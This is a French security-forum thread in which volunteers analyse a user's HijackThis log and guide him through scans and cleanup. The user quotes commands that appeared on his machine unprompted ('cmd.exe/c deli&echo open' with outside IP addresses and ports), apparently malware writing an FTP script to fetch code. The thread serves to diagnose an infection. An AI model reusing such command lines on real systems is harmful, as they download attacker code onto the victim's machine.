demande analyse HitJackthis

[Hans]

Comme conseillé sur ce meme forum , je communique ci dessous mon rapport Hijackthis , merci de m'aider a l'analyser , j'ai deja supprimé a tout hazard la reference n°20, mais peut-etre ai-je eu tort ?

 

Logfile of HijackThis v1.99.1

Scan saved at 23:19:46, on 01/01/2007

Platform: Windows XP SP2 (WinNT 5.01.2600)

MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

 

Running processes:

C:\WINDOWS\System32\smss.exe

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\lsass.exe

C:\WINDOWS\system32\Ati2evxx.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\System32\svchost.exe

C:\WINDOWS\system32\Ati2evxx.exe

C:\WINDOWS\system32\spoolsv.exe

C:\Program Files\Fichiers communs\Acronis\Schedule2\schedul2.exe

C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe

C:\Program Files\Alwil Software\Avast4\ashServ.exe

C:\WINDOWS\system32\CTSvcCDA.EXE

C:\WINDOWS\Explorer.EXE

C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe

C:\Program Files\Norton Utilities\NPROTECT.EXE

C:\Program Files\Speed Disk\nopdb.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\System32\ups.exe

C:\PROGRA~1\UpsPilot\Winpower.exe

C:\Program Files\RealVNC\VNC4\WinVNC4.exe

C:\WINDOWS\system32\MsPMSPSv.exe

C:\WINDOWS\system32\WgaTray.exe

C:\WINDOWS\system32\SearchIndexer.exe

C:\Program Files\Alwil Software\Avast4\ashWebSv.exe

C:\PROGRA~1\UpsPilot\monitor.exe

C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe

C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe

C:\PROGRA~1\BILLPS~1\WINPAT~1\winpatrol.exe

C:\Program Files\Java\jre1.5.0_09\bin\jusched.exe

C:\WINDOWS\system32\CTHELPER.EXE

C:\Program Files\Acronis\TrueImage\TrueImageMonitor.exe

C:\Program Files\Fichiers communs\Acronis\Schedule2\schedhlp.exe

C:\Program Files\ATI Technologies\ATI.ACE\CLI.EXE

C:\Program Files\ThiWeb Live\thiweblive.exe

C:\Program Files\Saitek\Software\ProfilerU.exe

C:\Program Files\Saitek\Software\SaiMfd.exe

C:\Program Files\Creative\MediaSource\RemoteControl\RCMan.EXE

C:\PROGRA~1\Cacheman\Cacheman.exe

C:\PROGRA~1\UpsPilot\hello21.exe

C:\WINDOWS\system32\ctfmon.exe

C:\Program Files\Fichiers communs\Ahead\Lib\NMBgMonitor.exe

C:\Program Files\ThiWeb Live\tlmaj.exe

C:\Program Files\Fichiers communs\Ahead\Lib\NMIndexStoreSvr.exe

C:\Program Files\Ditto\Ditto.exe

C:\FRAPS\FRAPS.EXE

D:\FB version 4.05_X45+ffb2_CF4\JOYTOCKEY\JoyToKey.exe

C:\Program Files\PrintKey 2000 Fr\Printkey 2000 Fr.exe

C:\Program Files\2BrightSparks\SyncBack\SyncBack.exe

C:\Program Files\ATI Technologies\ATI.ACE\cli.exe

C:\Program Files\ATI Technologies\ATI.ACE\cli.exe

C:\Program Files\Zeb-Utility\Zeb-Utility.exe

C:\Program Files\Skype\Phone\Skype.exe

C:\Program Files\Skype\Plugin Manager\SkypePM.exe

C:\Documents and Settings\jfj\Bureau\HijackThis.exe

 

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.phoenixjp.net/news/fr/

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =

R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens

O2 - BHO: HelperObject Class - {00C6482D-C502-44C8-8409-FCE54AD9C208} - C:\Program Files\TechSmith\SnagIt 7\SnagItBHO.dll

O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll

O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\PROGRA~1\Skype\Phone\IEPlugin\SKYPEI~1.DLL

O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_09\bin\ssv.dll

O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll

O3 - Toolbar: SnagIt - {8FF5E183-ABDE-46EB-B09E-D2AAB95CABE3} - C:\Program Files\TechSmith\SnagIt 7\SnagItIEAddin.dll

O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll

O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe

O4 - HKLM\..\Run: [sBDrvDet] C:\Program Files\Creative\SB Drive Det\SBDrvDet.exe /r

O4 - HKLM\..\Run: [updReg] C:\WINDOWS\UpdReg.EXE

O4 - HKLM\..\Run: [WinPatrol] C:\PROGRA~1\BILLPS~1\WINPAT~1\winpatrol.exe

O4 - HKLM\..\Run: [sunJavaUpdateSched] "C:\Program Files\Java\jre1.5.0_09\bin\jusched.exe"

O4 - HKLM\..\Run: [DiskeeperSystray] "C:\Program Files\Diskeeper Corporation\Diskeeper\DkIcon.exe"

O4 - HKLM\..\Run: [CTHelper] CTHELPER.EXE

O4 - HKLM\..\Run: [TrueImageMonitor.exe] C:\Program Files\Acronis\TrueImage\TrueImageMonitor.exe

O4 - HKLM\..\Run: [Acronis Scheduler2 Service] "C:\Program Files\Fichiers communs\Acronis\Schedule2\schedhlp.exe"

O4 - HKLM\..\Run: [ATICCC] "C:\Program Files\ATI Technologies\ATI.ACE\CLIStart.exe"

O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Fichiers communs\Ahead\Lib\NeroCheck.exe

O4 - HKLM\..\Run: [ThiWebLive] C:\Program Files\ThiWeb Live\thiweblive.exe

O4 - HKLM\..\Run: [Profiler] C:\Program Files\Saitek\Software\ProfilerU.exe

O4 - HKLM\..\Run: [saiMfd] C:\Program Files\Saitek\Software\SaiMfd.exe

O4 - HKLM\..\RunServices: [Winpower] C:\Program Files\UpsPilot\Winpower.exe

O4 - HKCU\..\Run: [RemoteCenter] C:\Program Files\Creative\MediaSource\RemoteControl\RCMan.EXE

O4 - HKCU\..\Run: [Cacheman] C:\PROGRA~1\Cacheman\Cacheman.exe

O4 - HKCU\..\Run: [skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized

O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe

O4 - HKCU\..\Run: [bgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Fichiers communs\Ahead\Lib\NMBgMonitor.exe"

O4 - HKCU\..\Run: [Ditto] C:\Program Files\Ditto\Ditto.exe

O4 - HKCU\..\Run: [Fraps] C:\FRAPS\FRAPS.EXE

O4 - Startup: Adobe Gamma.lnk = C:\Program Files\Fichiers communs\Adobe\Calibration\Adobe Gamma Loader.exe

O4 - Startup: JoyToKey.exe.lnk = D:\FB version 4.05_X45+ffb2_CF4\JOYTOCKEY\JoyToKey.exe

O4 - Startup: PrintKey 2000 Fr.lnk = C:\Program Files\PrintKey 2000 Fr\Printkey 2000 Fr.exe

O4 - Startup: SyncBack.lnk = C:\Program Files\2BrightSparks\SyncBack\SyncBack.exe

O4 - Global Startup: Lancement rapide d'Adobe Reader.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe

O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office12\EXCEL.EXE/3000

O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_09\bin\ssv.dll

O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_09\bin\ssv.dll

O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\PROGRA~1\Skype\Phone\IEPlugin\SKYPEI~1.DLL

O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\Office12\REFIEBAR.DLL

O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe

O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe

O15 - Trusted Zone: http://toolbar.imageshack.us

O17 - HKLM\System\CCS\Services\Tcpip\..\{BCDD79E1-A50B-405D-8CCD-EA6CC54AA01C}: NameServer = 192.168.1.1,212.27.32.176

O18 - Protocol: ms-help - {314111C7-A502-11D2-BBCA-00C04F8EC294} - C:\Program Files\Fichiers communs\Microsoft Shared\Help\hxds.dll

O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\FICHIE~1\Skype\SKYPE4~1.DLL

O18 - Filter hijack: text/xml - {807563E5-5146-11D5-A672-00B0D022E945} - C:\PROGRA~1\FICHIE~1\MICROS~1\OFFICE12\MSOXMLMF.DLL

O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll

O23 - Service: Acronis Scheduler2 Service (AcrSch2Svc) - Acronis - C:\Program Files\Fichiers communs\Acronis\Schedule2\schedul2.exe

O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Fichiers communs\Adobe Systems Shared\Service\Adobelmsvc.exe

O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - Unknown owner - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe

O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe

O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe

O23 - Service: avast! Antivirus - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashServ.exe

O23 - Service: avast! Mail Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe" /service (file missing)

O23 - Service: avast! Web Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe" /service (file missing)

O23 - Service: Creative Service for CDROM Access - Creative Technology Ltd - C:\WINDOWS\system32\CTSvcCDA.EXE

O23 - Service: Diskeeper - Diskeeper Corporation - C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe

O23 - Service: NBService - Nero AG - C:\Program Files\Nero\Nero 7\Nero BackItUp\NBService.exe

O23 - Service: Norton Unerase Protection (NProtectService) - Symantec Corporation - C:\Program Files\Norton Utilities\NPROTECT.EXE

O23 - Service: Speed Disk service - Symantec Corporation - C:\Program Files\Speed Disk\nopdb.exe

O23 - Service: Winpower - Zero G - C:\PROGRA~1\UpsPilot\Winpower.exe

O23 - Service: Winpoweragent - Zero G - C:\PROGRA~1\UpsPilot\monitor.exe

O23 - Service: Winpowerhello21 - Zero G - C:\PROGRA~1\UpsPilot\hello21.exe

O23 - Service: Winpowermanager - Zero G - C:\PROGRA~1\UpsPilot\manager.exe

O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Program Files\RealVNC\VNC4\WinVNC4.exe" -service (file missing)

Modifié le 2 janvier 2007 par Hans

[WawaSeb]

Bonjour Hans,

 

*** Bienvenue sur le forum sécurité de Zebulon ! ***

 

 

--> J'analyse ton rapport, retour prévu dans 20 / 30 minutes...

 

 

Merci pour ta patience...

[WawaSeb]

Re - ,

 

j'ai deja supprimé a tout hazard la reference n°20

• WgaLogon.dll gère la validité de ta version de Windows... C'est donc un processus légitime !
  

 

 

 

1) Relance HijackThis, ferme toutes les autres fenêtres et fixe la ligne suivante :

 

 

O15 - Trusted Zone: http://toolbar.imageshack.us ---> Est-ce toi qui a placé volontairement ce site en zone de confiance ? Je te conseille de lire ceci et de fixer cette ligne !

 

 

Tutoriels : http://pageperso.aol.fr/balltrap34/demohijack.htm (ne fixe rien pour le moment !!)

http://sitethemacs.free.fr/aide_enregistre...e_hijackthi.htm

 

 

 

2) Rends-toi sur ce site-ci

• Clique sur "Parcourir" (comme indiqué sur le dessin)
  
• Recherche le fichier suivant : C:\Program Files\ThiWeb Live\thiweblive.exe
  
• Clique sur "Submit"
  
• Fais de même avec C:\Program Files\ThiWeb Live\tlmaj.exe
  
• Copie-colle les rapports dans ta prochaine réponse...
  

*** Si le site est trop surchargé, tu peux refaire la même opération ici ("Send" à la place de "Submit")

 

 

 

3) Clique sur "Démarrer", "exécuter" et tape (sans les guillemets) "cleanmgr"

 

 

---> Valide en appuyant sur OK

---> Laisse Windows calculer, coche toutes les cases

---> Clique à nouveau sur OK

 

 

 

4) Nous allons vérifier qu'il ne reste pas d'autres infections à l'aide d'un scan en ligne :

 

Rends-toi sur le site de Kaspersky WebScanner

Dans "Démonstration en ligne", tu as une explication de la marche à suivre

Pour démarrer l'analyse, tu sélectionnes "Exécuter l'analyse en ligne".

 

Cette manipulation doit absolument être effectuée avec Internet Explorer

 

Télécharge le contôle Active X, accepte .

Dans le menu "Choisissez la cible de l'analyse", sélectionne "Poste de travail".

Le scan va commencer. Poste le rapport qui sera généré stp.

 

Très bon tutoriel ici : http://www.malekal.com/scan_Av_en_ligne.html#mozTocId237368

 

 

# Rencontres-tu des problèmes particuliers avec ta machine ?

# Est-elle plus lente que d'habitude ?

 

Passe une belle après-midi !

[Hans]

Tout d'abord , grand merci pour ton aide dans ce moment delicat....on se sent ainsi moins seul face a ses ennuis....!

j'ai effectué tous les points indiques dans ta precedente reponse , et aucun virus ou autre intrus n'a ete trouvé sur ma machine.Le dernier scan Kaspersky est en cours, et va certainement durer un bon moment....!

Par ailleurs a l'utilisation je ne remarque aucune modification particuliere jusqu'à present ,MAIS , j'ai cependant vu surgir toute seule il me semble ,et a 2 ou 3 reprises ,la fenetre "Executer" ( au dessus du bouton demarrer ), elle contient entre autre les 2 lignes suivantes qui m'intriguent un peu :

cmd.exe/c deli&echo open 82.250.54.34 8265>i&echo

cmd.exe/c deli&echo àpen 82.250.1.78 30365>i&echo

je reconnais sur la ligne inferieure le n° du port sollicité hier : 30365 !!!!, et je n'ai pas tapé ces lignes bizarres.......mais peut-etre que ça n'a rien a voir.....

Voila pour le moment , je te tiens au courant a la fin du scan AV.

Encore merci .

[Hans]

Le probleme vient de se reproduire,la meme fenetre "cmd.exe",que cellle d'hier s'est ouverte a l'ecran , avec une nouvelle IP , et un n° de port et de dossier get different,....? ça commence a m'inquieter ce cirque......car je n'y comprends pas grand chose !

Modifié le 2 janvier 2007 par Hans

[WawaSeb]

Bonsoir Hans,

 

 

1) Télécharge Blacklight (de F-Secure)

 

et sauvegarde-le sur ton Bureau.

 

Double-clique blbeta.exe et accepte la licence ; laisse [X]scan through Windows Explorer activé ; clique Scan puis Next

 

Tu verras une liste de fichiers détectés apparaître. Tu verras également un rapport, sur ton Bureau, nommé fsbl.xxxxxxx.log (les xxxxxxx sont des chiffres).

 

Copie et colle également le contenu de ce rapport dans ta prochaine réponse

 

 

2) Peux-tu également poster le rapport de Kaspersky stp ?

 

@u plaisir !

[Hans]

Ok , je trouve maintenant ta repônse ,et j'ai lance blacklight, je poste les resultats du log ci-apres :

 

01/03/07 15:50:03 [info]: BlackLight Engine 1.0.55 initialized

01/03/07 15:50:03 [info]: OS: 5.1 build 2600 (Service Pack 2)

01/03/07 15:50:04 [Note]: 7019 4

01/03/07 15:50:04 [Note]: 7005 0

01/03/07 15:50:40 [Note]: 7006 0

01/03/07 15:50:40 [Note]: 7011 2552

01/03/07 15:50:40 [Note]: 7026 0

01/03/07 15:50:40 [Note]: 7026 0

01/03/07 15:50:47 [Note]: FSRAW library version 1.7.1021

 

Blacklight me precise : no item found

Par contre je ne comprends pas tres bien ce que tu voulais dire ici :

"laisse [X]scan through Windows Explorer activé"

Merci encore pour ton aide

Modifié le 3 janvier 2007 par Hans

[WawaSeb]

Bonsoir Hans,

 

 

*** Tous tes rapports, jusqu'ici, sont propres ! ***

 

 

Par contre je ne comprends pas tres bien ce que tu voulais dire ici :

"laisse [X]scan through Windows Explorer activé"

----> Tout simplement, que tu ne devais pas décocher la case, ce que tu as très bien fait !

 

----> J'attends toujours ton rapport de Kaspersky...

[Hans]

Je t'enverrai demain le raport Kaspersky , car le scan est tres long et immobilise ma machine , je l'ai debuté mais n'ai pas pu aller au bout.

Je vais le relancer cette nuit.

[wacesea]

bonsoir Hans,

 

Est ce que tu as vu qu'un Serveur VNC tourne sur ton P ??

 

Running processes:

C:\Program Files\RealVNC\VNC4\WinVNC4.exe

 

C'est un soft de prise de controle pc à distance. Là tu as le Serveur installé sur ton pc et il tourne en tâche de fond. Si tu n'as pas souvenir de l'avoir installé, vire le vite.

 

Clique droit sur l'icône VNC dans la barre des tâches et sélectionner " Close VNC Server " ou faire un " Terminer le processus " dans le gestionnaire de tâches du processus [WinVNC4.exe].

 

Comment supprimer : Aller dans " Ajout/suppression de Programmes ", et désinstaller l'application " VNC Free Edition.

 

Pour ton cas précis, je pense plus à une application serveur quelconque installée sur ton pc. soit tu as reçu un mel avec le serveur en pièce jointe, soit tu as visité un site malveillant, soit encore tu as installé une application vérolée par un Serveur...

 

d'après ce que tu me décris, la ligne de commande ressemble effectivement à des instructions FTP. Et pas sur le port 21 lol. C'est une technique utilisée par les "mineurs" pour profiter de ta bande passante et de ton espace disque etc...

 

Voilà ce que je t'en dis au premier abord.